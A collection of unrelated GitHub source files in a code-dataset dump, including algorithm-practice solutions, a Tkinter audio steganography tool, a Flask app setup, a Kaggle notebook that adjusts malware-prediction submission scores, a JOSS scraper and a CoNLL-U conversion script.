print('accuracy result file has been copied to %s' % result_file_path_obs)\n else:\n print('accuracy is None')\n print('end')\n","repo_name":"Angus1996/HuaweiCloud_AI_Competition2019","sub_path":"keras/baseline/src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6160,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"13397836906","text":"'''\nhttps://www.acmicpc.net/problem/1935\n난이도 : 실버3\n'''\nimport sys\ninput = sys.stdin.readline\n\nn = int(input())\ncal_str = input().rstrip()\n\nalp_num = {}\nalp = []\nnum_arr = []\nstack = []\n\nfor i in range(n):\n num_arr.append(int(input()))\n\nfor s in cal_str:\n if ord(s) in range(ord('A'), ord('Z')+1) and s not in alp:\n alp.append(s)\n\nalp_num = dict(zip(alp, num_arr))\n\nfor s in cal_str:\n if ord(s) in range(ord('A'), ord('Z')+1):\n stack.append(alp_num[s])\n else:\n cal = 0\n num2 = stack.pop()\n num1 = stack.pop()\n if s == '+':\n cal = num1 + num2\n elif s == '-':\n cal = num1 - num2\n elif s == '/':\n cal = num1/num2\n elif s == '*':\n cal = num1 * num2\n \n stack.append(cal)\n \nprint(\"{:.2f}\".format(stack[0]))","repo_name":"kss02281/Algorithm_Study","sub_path":"2023_Solved/자료구조/1935_후위표기식2.py","file_name":"1935_후위표기식2.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11042475594","text":"import wave\nfrom tkinter import *\nfrom tkinter import filedialog\n\nfilepath = \"\" \n\ndef browseFiles():\n global filepath\n filepath = filedialog.askopenfilename(initialdir = \"/\",\n title = \"Select a File\",\n filetypes = [(\"Audio Files\",\n \".wav\")])\n # Change label contents\n filename = filepath.split(\"/\")[-1]\n label_file_explorer.configure(text=\"File Opened: \" + filename)\n return filepath\n\ndef encode(filepath, text):\n audio = wave.open(\"{}\".format(filepath) ,mode=\"rb\")\n frame_bytes = bytearray(list(audio.readframes(audio.getnframes())))\n string = text.get(\"1.0\",'end-1c')\n string = string + int((len(frame_bytes)-(len(string)*8*8))/8) *'#'\n bits = list(map(int, ''.join([bin(ord(i)).lstrip('0b').rjust(8,'0') for i in string])))\n for i, bit in enumerate(bits):\n frame_bytes[i] = (frame_bytes[i] & 254) | bit\n frame_modified = bytes(frame_bytes)\n\n filetypes = [('Audio Files', '.wav')]\n file = filedialog.asksaveasfile(initialdir = \"/\", \n title = \"Save As\", \n filetypes = filetypes, \n defaultextension = '.wav')\n newAudio = wave.open(file.name, 'wb')\n newAudio.setparams(audio.getparams())\n newAudio.writeframes(frame_modified)\n newAudio.close()\n audio.close()\n\ndef decode(frame):\n filepath = filedialog.askopenfilename(initialdir = \"/\",\n title = \"Select a File\",\n filetypes = [(\"Audio Files\",\n \".wav\")])\n audio = wave.open(\"{}\".format(filepath), mode='rb')\n frame_bytes = bytearray(list(audio.readframes(audio.getnframes())))\n extracted = [frame_bytes[i] & 1 for i in range(len(frame_bytes))]\n string = \"\".join(chr(int(\"\".join(map(str,extracted[i:i+8])),2)) for i in range(0,len(extracted),8))\n decoded = string.split(\"###\")[0]\n\n for widget in frame.winfo_children(): # Reset frame\n widget.destroy()\n canvas = Canvas(frame, bg = \"black\")\n scrollbar = Scrollbar(frame, orient=\"vertical\", command=canvas.yview)\n scrollable_frame = Frame(canvas)\n\n scrollable_frame.bind(\"\", lambda e: canvas.configure(scrollregion = canvas.bbox(\"all\")))\n\n canvas.create_window((0, 0), window = scrollable_frame, anchor =\"nw\", width = 570)\n canvas.configure(yscrollcommand=scrollbar.set)\n\n canvas.pack(side=\"left\", fill=\"both\", expand=True)\n scrollbar.pack(side=\"right\", fill=\"y\")\n frame_message = Message(scrollable_frame, \n text = decoded,\n anchor = W,\n justify = LEFT,\n width = 550,\n bg = \"black\", \n fg = \"white\", \n font = (\"Courier New\", 11))\n frame_message.pack(fill = BOTH)\n\n audio.close()\n\ndef down(x):\n for i in range(x):\n temp = Label(window)\n temp.pack()\n \n# Create the root window\nwindow = Tk()\n \n# Set window title\nwindow.title('Dreamcatcher Audio')\n\nwidth = 600\nheight = 600\nscreen_width = window.winfo_screenwidth() # Get your screen width\nscreen_height = window.winfo_screenheight() # Get your screen height\n\nx = (screen_width / 2) - (width / 2)\ny = (screen_height /2) - (height / 2)\nwindow.geometry(f'{width}x{height}+{int(x)}+{int(y)}') # Pop up window at the center of the screen\n\nwindow.resizable(0, 0)\n \n# Create a File Explorer label\nlabel_file_explorer = Label(window,\n text = \"Choose an audio file\",\n width = 40,\n height = 4)\n\nlabel = Label(window,\n text = \"Enter your message :\",\n width = 40,\n height = 2,\n anchor = S)\n \n \nbutton_explore = Button(window,\n text = \"Browse Files\",\n width = 17,\n command = browseFiles)\nbutton_encode = Button(window,\n text = \"Encode Audio File\",\n anchor = N,\n command = lambda: encode(filepath, text))\nbutton_decode = Button(window,\n text = \"Decode Audio File\",\n command = lambda: decode(frame))\n\ntext = Text(window, wrap = WORD)\nScrollBar = Scrollbar(text)\nScrollBar.config(command=text.yview)\ntext.config(yscrollcommand=ScrollBar.set)\nScrollBar.pack(side=RIGHT, fill= Y)\n\n\nlabel_file_explorer.pack()\n\nbutton_explore.pack()\nlabel.pack()\ntext.pack(fill = X, ipady = 60)\nbutton_encode.pack() # #\nline = Label(window, text = \"++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\")\nline.pack()\nbutton_decode.pack()\nframe = LabelFrame(window, text = \"HIDDEN MESSAGE\") # Create new frame\nframe.pack(fill = X)\n\ncanvas = Canvas(frame, bg = \"black\")\nscrollbar = Scrollbar(frame, orient=\"vertical\", command=canvas.yview)\nscrollable_frame = Frame(canvas)\n\nscrollable_frame.bind(\"\", lambda e: canvas.configure(scrollregion = canvas.bbox(\"all\")))\n\ncanvas.create_window((0, 0), window = scrollable_frame, anchor =\"nw\")\ncanvas.configure(yscrollcommand=scrollbar.set)\n\ncanvas.pack(side=\"left\", fill=\"both\", expand=True)\nscrollbar.pack(side=\"right\", fill=\"y\")\n\n\n \n# Let the window wait for any events\nwindow.mainloop()","repo_name":"MinhDuckky/dsp2021","sub_path":"DreamcatcherAudio.py","file_name":"DreamcatcherAudio.py","file_ext":"py","file_size_in_byte":5708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18039219394","text":"\"\"\" Application initializer.\"\"\"\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom os import path\nfrom flask_login import LoginManager\n\n\ndb = SQLAlchemy()\nbasedir = path.abspath(path.dirname(__file__))\nDB_NAME = \"database.db\"\n\n\ndef create_app():\n \"\"\" App creation and initialization function.\"\"\"\n app = Flask(__name__)\n app.config['SECRET_KEY'] = 'jhgjetdjq wjgkfc'\n app.config['SQLALCHEMY_DATABASE_URI'] = \\\n 'sqlite:///' + path.join(basedir, DB_NAME)\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n db.init_app(app)\n\n from .views import views\n from .auth import auth\n\n app.register_blueprint(views, url_prefix='/')\n app.register_blueprint(auth, url_prefix='/')\n\n from .models import Server, User\n\n with app.app_context():\n db.create_all()\n\n login_manager = LoginManager()\n login_manager.login_view = 'auth.login' # type: ignore\n login_manager.init_app(app)\n\n @login_manager.user_loader\n def load_user(id):\n return User.query.get(int(id))\n\n return app\n","repo_name":"bryansomto/Web-server_configurator","sub_path":"website/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74789814887","text":"import sys\nT = int(input())\n\nfor i in range(T):\n result = input()\n sum = 0\n score = 0\n for j in result:\n if j == \"X\":\n score = 0\n sum += score\n else :\n score += 1\n sum += score\n print(sum)\n\n\n","repo_name":"deltaori0/Python-Algorithm","sub_path":"baekjoon/step-by-step/step05/8958.py","file_name":"8958.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"254459179","text":"class Solution:\n def maxOperations(self, nums: List[int], k: int) -> int:\n pair_map, operations = defaultdict(int), 0\n for num in nums:\n #If pair found increment operations\n if pair_map[num]:\n operations += 1\n pair_map[num] -= 1\n else:\n pair_map[k- num] += 1\n return operations","repo_name":"gdsaikrishna/leet_code","sub_path":"1679. Max Number of K-Sum Pairs.py","file_name":"1679. Max Number of K-Sum Pairs.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16775422318","text":"from dotenv import load_dotenv\nfrom event import Event\n\nimport os\nimport icalendar\nimport urllib3\n\n\nload_dotenv()\n\n\nclass IcalParser:\n\n \n def fetch_data(self) -> None:\n self.__save_to_file(self.__fetch_data_of_url())\n\n\n def __fetch_data_of_url(self) -> bytes:\n response = urllib3.request(\"GET\", os.getenv(\"ICAL_URL\"))\n if (response.status == 200):\n return response.data\n \n print(f\"Invalid status code: {response.status}\")\n exit(1)\n\n\n def __save_to_file(self, data: bytes) -> None:\n with open(\"../icalFile.ics\", \"wb\") as ical_file: \n ical_file.write(data)\n\n def construct_events(self) -> list[Event]:\n calendar = icalendar.Calendar.from_ical(open(\"../icalFile.ics\", \"rb\").read())\n events: list[Event] = []\n for event in calendar.walk(\"VEVENT\"):\n if (event.get(\"RRULE\") != None):\n recurrence = event.get(\"RRULE\").to_ical().decode(\"utf-8\")\n else:\n recurrence = \"\"\n events.append(Event(\n summary=event.get(\"SUMMARY\").to_ical().decode(\"utf-8\"),\n description=\"\" if event.get(\"DESCRIPTION\") == None else event.get(\"DESCRIPTION\").to_ical().decode(\"utf-8\"),\n color_id=6,\n start=event.get(\"DTSTART\").to_ical().decode(\"utf-8\"),\n end=event.get(\"DTEND\").to_ical().decode(\"utf-8\"),\n location=event.get(\"LOCATION\").to_ical().decode(\"utf-8\") ,\n recurrence=recurrence\n ))\n return events\n ","repo_name":"Raboro/rapla-google-calendar-sync","sub_path":"src/icalparser.py","file_name":"icalparser.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10148626145","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Manual Model Manipulation Trick\n# In this kernel, we load a public Kaggle model's submission file, view it's malware infection rate over time, and modify it manually to match what train.csv's malware rate looks like over time. The original submission file scores Public LB 0.689 and Private LB 0.635. After correction, the updated file scores Public LB 0.693 and Private LB 0.750. \n# \n# I used this trick during the competition to increase Public LB score. But it wasn't until after the competition's end that I learned how to increase Private LB score. In the private test dataset, all computers on and after November 20, 2018 have `HasDetections=0` approximately. (Why is this?)\n\n# In[ ]:\n\n\n# IMPORT LIBRARIES\nimport pandas as pd, numpy as np, os, gc\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\nfrom datetime import timedelta\n\n# # Load files and time stamps\n# We will load the output from [Hung The Nguyen's][1] kernel [here][2]. And attach time stamps.\n# \n# [1]: https://www.kaggle.com/hung96ad\n# [2]: https://www.kaggle.com/hung96ad/new-blend\n\n# In[ ]:\n\n\n# Lower detection rate for August and September computers\nAdjustPublicScore = True\n# 0=No, 1=Remove Nov 20,21,22,23,24,25, 2=Downward trend Nov 20,21,22,23,24,25\nAdjustPrivateScore = 2\n\ndtypes = {}\ndtypes['MachineIdentifier'] = 'str'\ndtypes['AvSigVersion'] = 'category'\ndtypes['HasDetections'] = 'int8'\n\n# LOAD TRAIN DATA\ndf_train = pd.read_csv('../input/microsoft-malware-prediction/train.csv', usecols=list(dtypes.keys()), dtype=dtypes)\nprint ('Loaded',len(df_train),'rows of train.CSV!')\n\n# LOAD TEST DATA\ndf_test = pd.read_csv('../input/microsoft-malware-prediction/test.csv', usecols=list(dtypes.keys())[0:-1], dtype=dtypes)\nprint ('Loaded',len(df_test),'rows of test.CSV!')\n\n# LOAD PREDICTIONS FROM PUBLIC KERNEL\n# https://www.kaggle.com/hung96ad/new-blend\ndf_test2 = pd.read_csv('../input/kagglebest/super_blend.csv')\nprint ('Loaded',len(df_test),'rows of super_blend.csv!')\n\n# ADD TIMESTAMPS\ndatedictAS = np.load('../input/malware-timestamps/AvSigVersionTimestamps.npy')[()]\ndf_test['Date'] = df_test['AvSigVersion'].map(datedictAS)\ndf_train['Date'] = df_train['AvSigVersion'].map(datedictAS)\ndf_test2 = pd.merge(df_test2, df_test, on='MachineIdentifier', how='left')\ndf_test2['AvSigVersion2'] = df_test2['AvSigVersion'].map(lambda x: np.int(x.split('.')[1]) )\n\n# In[ ]:\n\n\nimport calendar, math\n\ndef staticPlot(data, col, target='HasDetections', bars=10, show=1.0, sortby='frequency'\n , verbose=1, top=5, title='',asc=False, dropna=False, minn=0.0):\n # calcuate density and detection rate\n cv = data[col].value_counts(dropna=dropna)\n cvd = cv.to_dict()\n nm = cv.index.values; lnn = len(nm); lnn2 = lnn\n th = show * len(data)\n th2 = minn * len(data)\n sum = 0; lnn2 = 0\n for x in nm[0:bars]:\n lnn2 += 1\n try: sum += cvd[x]\n except: sum += cv[x]\n if sum>th:\n break\n try:\n if cvd[x]start) & (data['Date']th:\n break\n top = min(top,len(nm))\n top2 = min(top2,len(nm),lnn2,top)\n\n # calculate rate within each time interval\n diff = (end-start).days*24*3600 + (end-start).seconds\n size = diff//(3600*((inc_mn * 28 + inc_dy) * 24 + inc_hr)) + 5\n data_counts = np.zeros([size,2*top+1],dtype=float)\n idx=0; idx2 = {}\n for i in range(top):\n idx2[nm[i]] = i+1\n low = start\n high = add_time(start,inc_mn,inc_dy,inc_hr)\n data_times = [low+(high-low)/2]\n while low=low) ]\n #data_counts[idx,0] = len(slice)\n data_counts[idx,0] = 5000*len(slice['AvSigVersion'].unique())\n for key in idx2:\n if nan_check(key): slice2 = slice[slice[col].isna()]\n else: slice2 = slice[slice[col]==key]\n data_counts[idx,idx2[key]] = len(slice2)\n if target in data:\n data_counts[idx,top+idx2[key]] = slice2['HasDetections'].mean()\n low = high\n high = add_time(high,inc_mn,inc_dy,inc_hr)\n data_times.append(low+(high-low)/2)\n idx += 1\n\n # plot lines\n fig = plt.figure(1,figsize=(15,3))\n cl = ['r','g','b','y','m']\n ax3 = fig.add_subplot(1,1,1)\n lines = []; labels = []\n if z==1: ax3.plot(data_times,data_counts[0:idx+1,0],'k')\n for i in range(top):\n tmp, = ax3.plot(data_times,data_counts[0:idx+1,i+1],cl[i%5])\n if dots: ax3.plot(data_times,data_counts[0:idx+1,i+1],cl[i%5]+'o')\n lines.append(tmp)\n labels.append(str(nm[i]))\n ax3.spines['left'].set_color('red')\n ax3.yaxis.label.set_color('red')\n ax3.tick_params(axis='y', colors='red')\n if col!='ones': ax3.set_ylabel('Category Density', color='r')\n else: ax3.set_ylabel('Data Density', color='r')\n #ax3.set_yticklabels([])\n if target in data:\n ax4 = ax3.twinx()\n for i in range(top2):\n ax4.plot(data_times,data_counts[0:idx+1,i+1+top],cl[i%5]+\":\")\n if dots: ax4.plot(data_times,data_counts[0:idx+1,i+1+top],cl[i%5]+\"o\")\n ax4.spines['left'].set_color('red')\n ax4.set_ylabel('Detection Rate', color='k')\n if title!='': plt.title(title)\n if legend==1: plt.legend(lines,labels,loc=2)\n plt.show()\n \n# INCREMENT A DATETIME\ndef add_time(sdate,months=0,days=0,hours=0):\n month = sdate.month -1 + months\n year = sdate.year + month // 12\n month = month % 12 + 1\n day = sdate.day + days\n if day>calendar.monthrange(year,month)[1]:\n day -= calendar.monthrange(year,month)[1]\n month += 1\n if month>12:\n month = 1\n year += 1\n hour = sdate.hour + hours\n if hour>23:\n hour = 0\n day += 1\n if day>calendar.monthrange(year,month)[1]:\n day -= calendar.monthrange(year,month)[1]\n month += 1\n if month>12:\n month = 1\n year += 1\n return datetime(year,month,day,hour,sdate.minute)\n\n# CHECK FOR NAN\ndef nan_check(x):\n if isinstance(x,float):\n if math.isnan(x):\n return True\n return False\n\n# # First, view train's malware probabilities\n# We notice that computers with AvSigVersion dates outside the window of sampling have lower malware probabilities. In the plot below, the dotted line uses the right y-axis and solid line uses left y-axis.\n\n# In[ ]:\n\n\ndf_train['ones'] = 1\ndynamicPlot(df_train,'ones',title='Training data. (Dotted line uses right y-axis. Solid uses left.)')\n\n# # Second, view original submission's malware probabilities\n# We notice that the probabilities before and after the sampling window should be lower. So we should correct them.\n\n# In[ ]:\n\n\ndf_test2['ones'] = 1\ndynamicPlot(df_test2,'ones',title='Original submission')\ndynamicPlot(df_test2,'AvSigVersion2',start=datetime(2018,9,1),end=datetime(2018,11,29),inc_dy=1,top2=4, dots=True)\n\n# # Third, adjust probabilities before and after sampling window\n# We will lower probabilities before September 26, 2018 and after November 20, 2018.\n\n# In[ ]:\n\n\nif AdjustPublicScore: df_test2.loc[ (df_test2['AvSigVersion2']==275)|(df_test2['AvSigVersion2']==273),'HasDetections'] *= 0.6\n\n# In[ ]:\n\n\ndynamicPlot(df_test2,'ones',title='Adjustment 1')\ndynamicPlot(df_test2,'AvSigVersion2',start=datetime(2018,9,1),end=datetime(2018,11,29),inc_dy=1,top2=4, dots=True)\n\n# In[ ]:\n\n\nif AdjustPrivateScore==1:\n df_test2.loc[ df_test2['Date']>datetime(2018,11,20,4,0) ,'HasDetections'] = 0\nelif AdjustPrivateScore==2:\n df_test2['X'] = df_test2['Date'] - datetime(2018,11,20,4,0) \n df_test2['X'] = df_test2['X'].map(lambda x: x.total_seconds()/86400)\n df_test2['X'].fillna(0,inplace=True)\n s = 5.813888\n df_test2['F'] = 1.0\n df_test2['F'] = 1 - df_test2['X']/s\n df_test2.loc[df_test2['X']<=0,'F'] = 1.0\n df_test2.loc[df_test2['X']>s,'F'] = 0\n df_test2['HasDetections'] *= df_test2['F']\n\n# In[ ]:\n\n\ndynamicPlot(df_test2,'ones',title='Adjustment 2')\ndynamicPlot(df_test2,'AvSigVersion2',start=datetime(2018,9,1),end=datetime(2018,11,29),inc_dy=1,top2=4,\n dots=True, title='adjustment 2')\n\n# # Submit updated submission file\n# The original submission file had Public/Private LB 0.698/0.635. The new updated file has Public/Private LB 0.693/0.750. Using this trick, one can correct the top Kaggle Microsoft Malware public kernel submission files, ensemble them, and score over 0.700 Public LB (and over 0.750 Private LB).\n\n# In[ ]:\n\n\ndf_test2[['MachineIdentifier','HasDetections']].to_csv('PrivateLeaderboard.csv', index=False)\n\n# ![image](http://playagricola.com/Kaggle/private331419.png)\n","repo_name":"tetherless-world/CodeGraph","sub_path":"kaggle/python_files/sample972.py","file_name":"sample972.py","file_ext":"py","file_size_in_byte":12212,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72174026088","text":"#!usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n#-------------------------------------------------------------------------------------------------\n# author: bitPanG98\n# direccion: bitpang98@gmail.com\n#\n# descripcion: Algoritmo desarrollado para planificar procesos\n# utilizando el algoritmo de planificacion FIFO.\n#-----------------------------------------------------------------------------------------------\n\n#modulos\nimport string\n\n\n#---------------------- variables a utilizar -----------------------\n\nnombre_proceso = string.ascii_uppercase\n\n\n\n#---------------------- funciones ---------------------\ndef graficar_linea():\n \"\"\"\n Funcion que permite graficar una linea grafica\n \"\"\"\n \n grafica_linea = \"|----\"*10\n \n return grafica_linea+\"|\"\n \n \ndef mostrar_serienumerica():\n \"\"\"\n Funcion que permite mostrar una sucesion numerica segun un rango\n de valores\n \"\"\"\n \n lista_serie = []\n serie_numerica = \"\"\n \n #creamos valores segun un rango y los almacenamos en una lista\n for num in range(0,11):\n lista_serie.append(num)\n\n #recorremos los valores de nuestra lista\n for num in lista_serie:\n #verificamos cuantos espacios dejaremos entre cada numero\n if num < 10:\n serie_numerica += str(num)+\" \"\n \n else:\n serie_numerica += str(num)+\" \"\n \n return serie_numerica\n\n\ndef graficar_barras(lista_rafagascpu):\n \"\"\"\n Funcion que permite graficar barras, recibiendo una lista con los valores\n a graficar.\n \"\"\"\n ancho = 5\n elaborar_grafica = \"\"\n \n colores = [\n \"\\033[41m\" , \"\\033[42m\" , \"\\033[43m\" , \"\\033[44m\" ,\n \"\\033[45m\" , \"\\033[46m\" , \"\\033[47m\"\n ]\n\n for rafaga in lista_rafagascpu:\n \n for color in colores:\n elaborar_grafica += color+str(ancho*rafaga)\n \nprint(\"\\033[40m\"+graficar_linea())\nprint(mostrar_serienumerica())\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"bitPanG98/Ejercicios","sub_path":"Python/Algoritmo-FCFS/metodo1_fcfs/util/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5172500056","text":"# Solution to advent of code Day 2 puzzle 1\n\nfile = open(\"input.txt\", \"r\")\n\n\n#Values for the card picked by player\nvalueDict = {\n \"X\": 1,\n \"Y\": 2,\n \"Z\": 3\n}\n\n# Initializes a score\nscore = 0\n\n# For each line in the file\nfor line in file:\n # Initializes results to false\n win = False\n draw = False\n loss = False\n\n # Saves the card chosen by opponent\n opponent = line[0]\n # Saves the card chosen by player\n player = line[2]\n\n #If opponent picked Rock\n if opponent == 'A':\n if player == 'X':\n draw = True\n elif player == 'Y':\n win = True\n elif player == 'Z':\n loss = True\n #If opponent picked Paper\n elif opponent == 'B':\n if player == 'X':\n loss = True\n elif player == 'Y':\n draw = True\n elif player == 'Z':\n win = True\n #If opponent picked Scissor\n elif opponent == 'C':\n if player == 'X':\n win = True\n elif player == 'Y':\n loss = True\n elif player == 'Z':\n draw = True\n\n # Adds points depending on the result\n if win == True:\n score += 6 + valueDict[player]\n elif draw == True:\n score += 3 + valueDict[player]\n elif loss == True:\n score += valueDict[player]\n\n\n\nprint(score)\n","repo_name":"Fillewow/Advent_of_code_2022","sub_path":"2/Puzzle_1.py","file_name":"Puzzle_1.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28276092344","text":"\"\"\"Script for extracting metadata about a given paper on JOSS\"\"\"\nimport sys\nimport json\nfrom bs4 import BeautifulSoup as bs\nimport requests\nimport lxml\nfrom dateutil.parser import parse\n\ndef get_response(page_url):\n \"\"\"Returns response to html request on page_url\"\"\"\n response = requests.get(page_url)\n # print(page_url, response.status_code)\n return response\n\ndef main():\n \"\"\"Main function\"\"\"\n url = sys.argv[1]\n response = get_response(url)\n soup = bs(response.content, 'lxml')\n\n # find meta block\n meta = soup.find('div', class_='paper-meta')\n\n # extract title\n title = meta.h1.string\n # print(title)\n\n # extract submission and publish dates\n date_spans = meta.find_all('span', class_='small')\n date_strings = [\n parse(\" \".join(span.string.split()[1:]))\n for span in date_spans\n ]\n # print(date_strings)\n\n # extract language tags\n lang_spans = meta.find_all('span', class_='badge-lang')\n lang_tags = [span.string for span in lang_spans]\n # print(lang_tags)\n\n # Find sidebar\n sidebar = soup.find('div', class_='paper-sidebar')\n # print(sidebar)\n\n # Extract field tags\n tag_spans = sidebar.find_all('span', class_='badge-lang')\n field_tags = [span.string for span in tag_spans]\n # print(field_tags)\n\n # Extract software repo url\n repo_url = soup.find('a', class_='paper-btn').get('href')\n # print(repo_url)\n\n data = {\n \"title\": title,\n \"submission_date\": str(date_strings[0]),\n \"publish_date\": str(date_strings[1]),\n \"lang_tags\": lang_tags,\n \"field_tags\": field_tags,\n \"repo_url\": repo_url\n }\n\n print(json.dumps(data))\n\nmain()\n","repo_name":"JamieJQuinn/joss-scraper","sub_path":"fetch_paper_details.py","file_name":"fetch_paper_details.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42394756465","text":"import os\nfrom dotenv import load_dotenv\nload_dotenv(\".env\")\nCLIENT_ID = os.getenv(\"CLIENT_ID\")\n\nCLIENT_SECRET = os.getenv(\"CLIENT_SECRET\")\n# In a production app, we recommend you use a more secure method of storing your secret,\n# like Azure Key Vault. Or, use an environment variable as described in Flask's documentation:\n# https://flask.palletsprojects.com/en/1.1.x/config/#configuring-from-environment-variables\n# CLIENT_SECRET = os.getenv(\"CLIENT_SECRET\")\n# if not CLIENT_SECRET:\n# raise ValueError(\"Need to define CLIENT_SECRET environment variable\")\n\nTENANT_ID = os.getenv(\"TENANT_ID\")\nAUTHORITY = f\"https://login.microsoftonline.com/{TENANT_ID}\" # For multi-tenant app\n# AUTHORITY = \"https://login.microsoftonline.com/Enter_the_Tenant_Name_Here\"\n\nREDIRECT_PATH = \"/get_auth_token\" # Used for forming an absolute URL to your redirect URI.\n# The absolute URL must match the redirect URI you set\n# in the app's registration in the Azure portal.\n\n# You can find more Microsoft Graph API endpoints from Graph Explorer\n# https://developer.microsoft.com/en-us/graph/graph-explorer\nENDPOINT = \"https://graph.microsoft.com/v1.0/users\" # This resource requires no admin consent\n\n\n# You can find the proper permission names from this document\n# https://docs.microsoft.com/en-us/graph/permissions-reference\nSCOPE = [\"User.ReadBasic.All\"]\n\nSESSION_TYPE = \"filesystem\" # Specifies the token cache should be stored in server-side session\nAPPLICATIONINSIGHTS_CONNECTION_STRING = os.getenv(\"APPLICATIONINSIGHTS_CONNECTION_STRING\")\nDB_ACCOUNT_URI = os.getenv(\"DB_ACCOUNT_URI\")\nDB_ACCOUNT_KEY = os.getenv(\"DB_ACCOUNT_KEY\")\nDB_NAME = os.getenv(\"DB_NAME\")\nDB_CONTAINER_NAME = os.getenv(\"DB_CONTAINER_NAME\")\nPORT = os.getenv(\"PORT\")\nVOTING_SERVICE_URL=os.getenv(\"VOTING_SERVICE_URL\")\nFUNCTION_KEY=os.getenv(\"FUNCTION_KEY\")","repo_name":"mateuszGorczany/Oceniaczka","sub_path":"app_config.py","file_name":"app_config.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14427076528","text":"# Author: Theresa Schmidt, 2021 \n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\n\"\"\"\nCreates CoNLL-U formatted tsv files from our tagger's or parser's output files.\nAlso creates files for error analysis.\n\n1. Analysis mode (default): Takes AllenNLP prediction for sequence tags and\n complementary annotated (gold) file. Prints all columns of the annotated\n file plus an extra column for wrongly predicted tokens into a tab separated file.\n2. tagger prediction2conllu: takes a tagging prediction file (json format) and\n writes a CoNLL-U file with the given columns.\n3. parser prediction2conllu: takes a parsing prediction file (json format) and\n writes a CoNLL-U file with the given columns.\n\nTested with Python 3.7\n\nReferences:\n - Lin et al. (2020).\n A recipe for creating multimodal aligned datasets for sequential tasks.\n In Proceedings of the58th Annual Meeting of the Association for Computational Linguistics, pages 4871–4884, Online.\n Association for Computational Linguistics.\n - CoNLL-U: https://universaldependencies.org/format.html\n\"\"\"\n\nimport argparse\nimport json\nfrom ast import literal_eval\nimport logging\n\n\ndef read_prediction_tokens(pred_file):\n \"\"\"\n Reads in the tokens from the tagger's output file.\n\n Returns: a String list\n \"\"\"\n tokens = []\n with open(pred_file, encoding=\"utf-8\") as f:\n for line in f:\n j = json.loads(line)\n tokens.extend(j[\"words\"])\n return tokens\n\n\ndef read_prediction_tags(pred_file):\n \"\"\"\n Reads in the predicted tags from the tagger's output file. Or the\n tags used as part of the input for the parser.\n Also determines the source of the data, i.e. whether it was\n generated by the tagger or the parser.\n\n Returns: a String list with the predicted tags.\n \"\"\"\n model_type = None\n tags = []\n with open(pred_file, encoding=\"utf-8\") as f:\n for line in f:\n j = json.loads(line)\n try:\n tags.extend(j[\"tags\"])\n model_type = \"tagger\"\n except KeyError:\n tags.extend(j[\"pos\"])\n model_type = \"parser\"\n return tags, model_type\n\n\ndef read_prediction_dependencies(pred_file):\n \"\"\"\n Reads in the predictions from the parser's output file.\n\n Returns: two String list with the predicted heads and dependency names, respectively.\n \"\"\"\n heads = []\n deps = []\n with open(pred_file, encoding=\"utf-8\") as f:\n for line in f:\n j = json.loads(line)\n heads.extend(j[\"predicted_heads\"])\n deps.extend(j[\"predicted_dependencies\"])\n heads = list(map(str, heads))\n return heads, deps\n\n\ndef write_with_misjudgements(gold, prediction, goldlines, out_file):\n \"\"\"\n Writes a tsv file with the first columns repeating the gold annotated\n file. The last column contains all predictions that do not match the\n gold annotation. If the prediction was correct, the last column in\n that line stays empty.\n \"\"\"\n with open(out_file, \"w\", encoding=\"utf-8\") as f:\n for g, p, line in zip(gold, prediction, goldlines):\n s = \"\\t\".join(line)\n if g != p:\n s += \"\\t\" + str(p)\n f.write(s + \"\\n\")\n\n\ndef _read_gold_conllu_simplified(gold_file):\n \"\"\"\n Reads in the gold annotation from a file in CoNLL-U format.\n WARNING: Does not read in extra edges in 9th column!\n\n Returns:\n - tags: a String list containing one sequence tag per line.\n E.g. [B-Kochschritt, L-Kochschritt, U-Zutat, O]\n - heads: a String list containing one head reference (its token ID)\n per line.\n - deps: a String list containing one dependency name per line for the\n relation between the token in that line and the token at the\n ID of 'head'.\n - lines: a list list containing the original line split at \"\\t\"\n \"\"\"\n tags = []\n heads = []\n deps = []\n lines = []\n with open(gold_file, 